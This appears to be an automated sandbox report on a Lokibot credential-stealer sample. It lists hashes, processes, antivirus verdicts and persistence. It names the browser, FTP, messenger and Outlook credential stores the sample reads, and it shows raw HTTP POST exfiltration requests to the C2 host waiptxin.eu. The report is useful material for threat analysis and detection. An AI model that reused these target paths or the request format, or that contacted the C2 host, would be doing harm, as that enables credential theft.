· 6 years ago · Sep 04, 2019, 11:23 PM
1
2* MalFamily: "Lokibot"
3
4* MalScore: 10.0
5
6* File Name: "00227804"
7* File Size: 886272
8* File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
9* SHA256: "a3f3cddf09f10ff782a96be311c767e336b25af010d0720a9a8e8a275bb6f37a"
10* MD5: "a33526b80aed53c525834a15dff6f486"
11* SHA1: "82d64786027ab8db5ee5f738b1f1b8e487a1cd89"
12* SHA512: "d5ba382c396a85dafc00a8493b6a653767eb494d4063a37e576bb5c6243913a49957350eb872c63cde74bda9854fb44888ded2dc4546c9b9e390da5a717aa13b"
13* CRC32: "EF9A6D71"
14* SSDEEP: "12288:j8MI3z8rANQUWpBZY6vcxDyJaOBXS7DGCAhGFgZahbCk9DclCbXuFF+zdxNL:E3uANjWpNCD4lRS1KZC9XuwjNL"
15
16* Process Execution:
17 "00227804.exe",
18 "odjf.exe",
19 "odjf.exe",
20 "services.exe",
21 "lsass.exe",
22 "sdclt.exe",
23 "taskhost.exe",
24 "sc.exe",
25 "svchost.exe",
26 "svchost.exe",
27 "WerFault.exe",
28 "wermgr.exe",
29 "svchost.exe",
30 "WerFault.exe",
31 "wermgr.exe"
32
33
34* Executed Commands:
35 "\"C:\\Users\\user\\AppData\\Roaming\\ndiso\\odjf.exe\"",
36 "C:\\Windows\\system32\\lsass.exe",
37 "C:\\Windows\\System32\\sdclt.exe /CONFIGNOTIFICATION",
38 "taskhost.exe $(Arg0)",
39 "C:\\Windows\\system32\\sc.exe start w32time task_started",
40 "C:\\Windows\\system32\\svchost.exe -k LocalService",
41 "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
42 "C:\\Windows\\system32\\WerFault.exe -u -p 3060 -s 288",
43 "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_30ff788d55c8dd8e13e51cbc4a41a06fb37b455_cab_016c3a94\"",
44 "C:\\Windows\\system32\\WerFault.exe -u -p 1056 -s 108",
45 "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_svchost.exe_5c9dc22e27dc86b7ce5726e7d9b5fc15b4163_cab_0955cfb8\""
46
47
48* Signatures Detected:
49
50 "Description": "At least one process apparently crashed during execution",
51 "Details":
52
53
54 "Description": "Creates RWX memory",
55 "Details":
56
57
58 "Description": "A process attempted to delay the analysis task.",
59 "Details":
60
61 "Process": "odjf.exe tried to sleep 1275 seconds, actually delayed analysis time by 0 seconds"
62
63
64
65
66 "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
67 "Details":
68
69 "post_no_referer": "HTTP traffic contains a POST request with no referer header"
70
71
72 "http_version_old": "HTTP traffic uses version 1.0"
73
74
75 "suspicious_request": "http://waiptxin.eu/sleek2/cat.php"
76
77
78
79
80 "Description": "Performs some HTTP requests",
81 "Details":
82
83 "url": "http://waiptxin.eu/sleek2/cat.php"
84
85
86
87
88 "Description": "Executed a process and injected code into it, probably while unpacking",
89 "Details":
90
91 "Injection": "odjf.exe(1792) -> odjf.exe(1328)"
92
93
94
95
96 "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
97 "Details":
98
99 "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 13907803 times"
100
101
102
103
104 "Description": "Steals private information from local Internet browsers",
105 "Details":
106
107 "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
108
109
110
111
112 "Description": "Installs itself for autorun at Windows startup",
113 "Details":
114
115 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ndiso.vbs"
116
117
118 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ndiso.vbs"
119
120
121
122
123 "Description": "Creates a hidden or system file",
124 "Details":
125
126 "file": "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe"
127
128
129 "file": "C:\\Users\\user\\AppData\\Roaming\\474604"
130
131
132
133
134 "Description": "File has been identified by 42 Antiviruses on VirusTotal as malicious",
135 "Details":
136
137 "MicroWorld-eScan": "Trojan.Agent.EAZY"
138
139
140 "McAfee": "Fareit-FOZ!A33526B80AED"
141
142
143 "Cylance": "Unsafe"
144
145
146 "K7AntiVirus": "Riskware ( 0040eff71 )"
147
148
149 "Alibaba": "Backdoor:Win32/LokiBot.6e2b0742"
150
151
152 "K7GW": "Riskware ( 0040eff71 )"
153
154
155 "Cybereason": "malicious.6027ab"
156
157
158 "F-Prot": "W32/Fareit.DDQ"
159
160
161 "Symantec": "Trojan.Gen.MBT"
162
163
164 "APEX": "Malicious"
165
166
167 "Paloalto": "generic.ml"
168
169
170 "GData": "Trojan.Agent.EAZY"
171
172
173 "Kaspersky": "HEUR:Backdoor.Win32.Androm.gen"
174
175
176 "BitDefender": "Trojan.Agent.EAZY"
177
178
179 "Avast": "Win32:Malware-gen"
180
181
182 "Endgame": "malicious (high confidence)"
183
184
185 "Sophos": "Mal/Fareit-V"
186
187
188 "DrWeb": "Trojan.PWS.Stealer.19347"
189
190
191 "Invincea": "heuristic"
192
193
194 "McAfee-GW-Edition": "BehavesLike.Win32.Fareit.ch"
195
196
197 "FireEye": "Generic.mg.a33526b80aed53c5"
198
199
200 "Emsisoft": "Trojan.Agent.EAZY (B)"
201
202
203 "SentinelOne": "DFI - Suspicious PE"
204
205
206 "Cyren": "W32/Fareit.TLGU-5258"
207
208
209 "Webroot": "W32.Trojan.Gen"
210
211
212 "Arcabit": "Trojan.Agent.EAZY"
213
214
215 "AegisLab": "Trojan.Win32.Androm.m!c"
216
217
218 "ZoneAlarm": "HEUR:Backdoor.Win32.Androm.gen"
219
220
221 "Microsoft": "Trojan:Win32/LokiBot.DW!MTB"
222
223
224 "AhnLab-V3": "Win-Trojan/Delphiless.Exp"
225
226
227 "Acronis": "suspicious"
228
229
230 "VBA32": "BScope.Trojan.Kryptik"
231
232
233 "MAX": "malware (ai score=100)"
234
235
236 "Ad-Aware": "Trojan.Agent.EAZY"
237
238
239 "Malwarebytes": "Trojan.MalPack.DLF"
240
241
242 "ESET-NOD32": "a variant of Win32/Injector.EGTX"
243
244
245 "TrendMicro-HouseCall": "TrojanSpy.Win32.LOKI.SMDD.hp"
246
247
248 "Rising": "Trojan.Injector!1.AF18 (CLASSIC)"
249
250
251 "Ikarus": "Trojan.Win32.Injector"
252
253
254 "Fortinet": "W32/Injector.EGKJ!tr"
255
256
257 "AVG": "Win32:Malware-gen"
258
259
260 "CrowdStrike": "win/malicious_confidence_100% (W)"
261
262
263
264
265 "Description": "Checks the system manufacturer, likely for anti-virtualization",
266 "Details":
267
268
269 "Description": "Creates a copy of itself",
270 "Details":
271
272 "copy": "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe"
273
274
275
276
277 "Description": "Harvests credentials from local FTP client softwares",
278 "Details":
279
280 "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\sitemanager.xml"
281
282
283 "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
284
285
286 "file": "C:\\Users\\user\\AppData\\Roaming\\Far Manager\\Profile\\PluginsData\\42E4AEB1-A230-44F4-B33C-F195BB654931.db"
287
288
289 "file": "C:\\Program Files (x86)\\FTPGetter\\Profile\\servers.xml"
290
291
292 "file": "C:\\Users\\user\\AppData\\Roaming\\FTPGetter\\servers.xml"
293
294
295 "file": "C:\\Users\\user\\AppData\\Roaming\\Estsoft\\ALFTP\\ESTdb2.dat"
296
297
298 "key": "HKEY_CURRENT_USER\\Software\\Far\\Plugins\\FTP\\Hosts"
299
300
301 "key": "HKEY_CURRENT_USER\\Software\\Far2\\Plugins\\FTP\\Hosts"
302
303
304 "key": "HKEY_CURRENT_USER\\Software\\Ghisler\\Total Commander"
305
306
307 "key": "HKEY_CURRENT_USER\\Software\\LinasFTP\\Site Manager"
308
309
310
311
312 "Description": "Harvests information related to installed instant messenger clients",
313 "Details":
314
315 "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
316
317
318
319
320 "Description": "Harvests information related to installed mail clients",
321 "Details":
322
323 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
324
325
326 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046\\Email"
327
328
329 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046"
330
331
332 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326"
333
334
335 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff\\Email"
336
337
338 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326\\Email"
339
340
341 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
342
343
344 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
345
346
347 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
348
349
350 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e\\Email"
351
352
353 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1\\Email"
354
355
356 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff"
357
358
359 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2"
360
361
362 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670"
363
364
365 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7\\Email"
366
367
368 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e"
369
370
371 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2\\Email"
372
373
374 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\Email"
375
376
377 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a\\Email"
378
379
380 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001\\Email"
381
382
383 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
384
385
386 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259"
387
388
389 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001"
390
391
392 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
393
394
395 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259\\Email"
396
397
398 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"
399
400
401 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7"
402
403
404 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670\\Email"
405
406
407 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604\\Email"
408
409
410 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
411
412
413 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a"
414
415
416 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046"
417
418
419 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604"
420
421
422 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1"
423
424
425 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046\\Email"
426
427
428
429
430 "Description": "Attempts to interact with an Alternate Data Stream (ADS)",
431 "Details":
432
433 "file": "C:\\Users\\user\\AppData\\Roaming\\ndiso\\odjf.exe:ZoneIdentifier"
434
435
436
437
438 "Description": "Collects information to fingerprint the system",
439 "Details":
440
441
442 "Description": "Anomalous binary characteristics",
443 "Details":
444
445 "anomaly": "Timestamp on binary predates the release date of the OS version it requires by at least a year"
446
447
448
449
450 "Description": "Created network traffic indicative of malicious activity",
451 "Details":
452
453 "signature": "ET TROJAN LokiBot User-Agent (Charon/Inferno)"
454
455
456 "signature": "ET TROJAN LokiBot Fake 404 Response"
457
458
459 "signature": "ET TROJAN LokiBot Checkin"
460
461
462 "signature": "ET TROJAN LokiBot Request for C2 Commands Detected M2"
463
464
465 "signature": "ET TROJAN LokiBot Request for C2 Commands Detected M1"
466
467
468 "signature": "ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1"
469
470
471 "signature": "ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2"
472
473
474
475
476
477* Started Service:
478 "VaultSvc",
479 "WerSvc",
480 "W32Time"
481
482
483* Mutexes:
484 "6EFA73A4746045B65DEE781E",
485 "Local\\WERReportingForProcess3060",
486 "Global\\\\xe5\\x88\\x90\\xc2\\x9d",
487 "Global\\\\xed\\x95\\xb0\\xc7\\xa6",
488 "WERUI_BEX64-30ff788d55c8dd8e13e51cbc4a41a06fb37b455",
489 "Local\\WERReportingForProcess1056",
490 "Global\\\\xe5\\x88\\x90\\xc2\\x8d",
491 "Global\\\\xed\\x99\\xb0\\xc7\\x88",
492 "WERUI_APPCRASH-5c9dc22e27dc86b7ce5726e7d9b5fc15b4163"
493
494
495* Modified Files:
496 "C:\\Users\\user\\AppData\\Roaming\\ndiso\\odjf.exe",
497 "C:\\Users\\user\\AppData\\Roaming\\ndiso\\odjf.exe:ZoneIdentifier",
498 "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ndiso.vbs",
499 "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.lck",
500 "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe",
501 "C:\\Windows\\sysnative\\LogFiles\\Scm\\2ce1541b-c7b1-4ba0-8974-722d18a3c54d",
502 "C:\\Windows\\sysnative\\LogFiles\\Scm\\4963ad21-c4a5-42a5-b9bd-e441d57204fe",
503 "C:\\Windows\\sysnative\\LogFiles\\Scm\\7bbc503c-5977-4798-a4ae-61483a7e030d",
504 "C:\\Windows\\sysnative\\LogFiles\\Scm\\4e6828f4-11de-47bf-b7df-2249f4bdea4e",
505 "\\??\\PIPE\\lsarpc",
506 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB463.tmp.appcompat.txt",
507 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB771.tmp.WERInternalMetadata.xml",
508 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB791.tmp.hdmp",
509 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBD7E.tmp.mdmp",
510 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_30ff788d55c8dd8e13e51cbc4a41a06fb37b455_cab_016c3a94\\WERB463.tmp.appcompat.txt",
511 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_30ff788d55c8dd8e13e51cbc4a41a06fb37b455_cab_016c3a94\\WERB771.tmp.WERInternalMetadata.xml",
512 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_30ff788d55c8dd8e13e51cbc4a41a06fb37b455_cab_016c3a94\\WERB791.tmp.hdmp",
513 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_30ff788d55c8dd8e13e51cbc4a41a06fb37b455_cab_016c3a94\\WERBD7E.tmp.mdmp",
514 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_30ff788d55c8dd8e13e51cbc4a41a06fb37b455_cab_016c3a94\\Report.wer",
515 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_30ff788d55c8dd8e13e51cbc4a41a06fb37b455_cab_016c3a94\\Report.wer.tmp",
516 "C:\\Windows\\Temp\\WERA006.tmp.appcompat.txt",
517 "C:\\Windows\\Temp\\WERA065.tmp.WERInternalMetadata.xml",
518 "C:\\Windows\\Temp\\WERA0E3.tmp.hdmp",
519 "C:\\Windows\\Temp\\WERAAD7.tmp.mdmp",
520 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_svchost.exe_5c9dc22e27dc86b7ce5726e7d9b5fc15b4163_cab_0955cfb8\\WERA006.tmp.appcompat.txt",
521 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_svchost.exe_5c9dc22e27dc86b7ce5726e7d9b5fc15b4163_cab_0955cfb8\\WERA065.tmp.WERInternalMetadata.xml",
522 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_svchost.exe_5c9dc22e27dc86b7ce5726e7d9b5fc15b4163_cab_0955cfb8\\WERA0E3.tmp.hdmp",
523 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_svchost.exe_5c9dc22e27dc86b7ce5726e7d9b5fc15b4163_cab_0955cfb8\\WERAAD7.tmp.mdmp",
524 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_svchost.exe_5c9dc22e27dc86b7ce5726e7d9b5fc15b4163_cab_0955cfb8\\Report.wer",
525 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_svchost.exe_5c9dc22e27dc86b7ce5726e7d9b5fc15b4163_cab_0955cfb8\\Report.wer.tmp"
526
527
528* Deleted Files:
529 "C:\\Users\\user\\AppData\\Roaming\\ndiso\\odjf.exe",
530 "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ndiso.vbs",
531 "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.lck",
532 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB463.tmp",
533 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB463.tmp.appcompat.txt",
534 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB771.tmp",
535 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB771.tmp.WERInternalMetadata.xml",
536 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB791.tmp",
537 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB791.tmp.hdmp",
538 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBD7E.tmp",
539 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBD7E.tmp.mdmp",
540 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_30ff788d55c8dd8e13e51cbc4a41a06fb37b455_cab_016c3a94\\Report.wer.tmp",
541 "C:\\Windows\\Temp\\WERA006.tmp",
542 "C:\\Windows\\Temp\\WERA006.tmp.appcompat.txt",
543 "C:\\Windows\\Temp\\WERA065.tmp",
544 "C:\\Windows\\Temp\\WERA065.tmp.WERInternalMetadata.xml",
545 "C:\\Windows\\Temp\\WERA0E3.tmp",
546 "C:\\Windows\\Temp\\WERA0E3.tmp.hdmp",
547 "C:\\Windows\\Temp\\WERAAD7.tmp",
548 "C:\\Windows\\Temp\\WERAAD7.tmp.mdmp",
549 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_svchost.exe_5c9dc22e27dc86b7ce5726e7d9b5fc15b4163_cab_0955cfb8\\Report.wer.tmp"
550
551
552* Modified Registry Keys:
553 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\Type",
554 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
555 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\TimeProviders\\NtpClient\\SpecialPollTimeRemaining",
556 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
557 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent",
558 "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Debug",
559 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\Debug\\ExceptionRecord",
560 "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent",
561 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Debug",
562 "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\Debug\\StoreLocation",
563 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\Debug\\StoreLocation",
564 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Debug\\StoreLocation"
565
566
567* Deleted Registry Keys:
568
569* DNS Communications:
570
571 "type": "A",
572 "request": "waiptxin.eu",
573 "answers":
574
575 "data": "47.254.214.55",
576 "type": "A"
577
578
579
580
581
582* Domains:
583
584 "ip": "47.254.214.55",
585 "domain": "waiptxin.eu"
586
587
588
589* Network Communication - ICMP:
590
591* Network Communication - HTTP:
592
593 "count": 2,
594 "body": "",
595 "uri": "http://waiptxin.eu/sleek2/cat.php",
596 "user-agent": "Mozilla/4.08 (Charon; Inferno)",
597 "method": "POST",
598 "host": "waiptxin.eu",
599 "version": "1.0",
600 "path": "/sleek2/cat.php",
601 "data": "POST /sleek2/cat.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: waiptxin.eu\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: C6C7D52C\r\nContent-Length: 176\r\nConnection: close\r\n\r\n",
602 "port": 80
603
604
605 "count": 21,
606 "body": "",
607 "uri": "http://waiptxin.eu/sleek2/cat.php",
608 "user-agent": "Mozilla/4.08 (Charon; Inferno)",
609 "method": "POST",
610 "host": "waiptxin.eu",
611 "version": "1.0",
612 "path": "/sleek2/cat.php",
613 "data": "POST /sleek2/cat.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: waiptxin.eu\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: C6C7D52C\r\nContent-Length: 149\r\nConnection: close\r\n\r\n",
614 "port": 80
615
616
617
618* Network Communication - SMTP:
619
620* Network Communication - Hosts:
621
622* Network Communication - IRC: